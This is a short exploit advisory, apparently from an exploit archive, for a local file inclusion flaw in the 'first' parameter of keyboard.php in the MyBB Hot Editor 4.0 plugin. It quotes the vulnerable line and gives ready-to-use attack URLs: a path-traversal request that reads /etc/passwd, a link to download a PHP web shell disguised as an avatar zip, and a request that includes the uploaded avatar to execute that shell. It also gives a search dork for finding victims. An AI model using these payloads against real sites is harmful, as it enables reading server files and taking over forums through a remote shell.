The MyBB Hot Editor plugin version 4.0 suffers from a local file inclusion vulnerability in the "first" variable in keyboard.php.
4acfe1429e3c6665582ad8a653da47543cf23e72c2de86b14572ade8f99554bd
<html><head><META NAME='description' CONTENT='Mybb Hot Editor Plugin Local File Inclusion'>
<META NAME='keywords' CONTENT='Mybb Hot Editor Plugin Local File Inclusion'><title>Mybb Hot Editor Plugin Local File Inclusion</title></head><pre><?php
/*
Vendor : Liz0ziM
Web : www.expw0rm.com
Mail : liz0@expw0rm.com
---------------------------------------
Vul. Code : keyboard.php line 3
require_once "./vk_code/$first";
----------------------------------------
*/
http://victim.com/[path]/richedit/keyboard.php?first=../../../../../../../../../../../../../../../../../etc/passwd
And
upload php shell = > http://www.expw0rm.com/avatar_36.zip
http://victim.com/[path]/richedit/keyboard.php?first=../../uploads/avatars/avatar_36.gif => target isn't show with ie.plese you use firefox
Dork: "MTR Paket :"
?>
// Exploit Worm www.expw0rm.com</pre><html>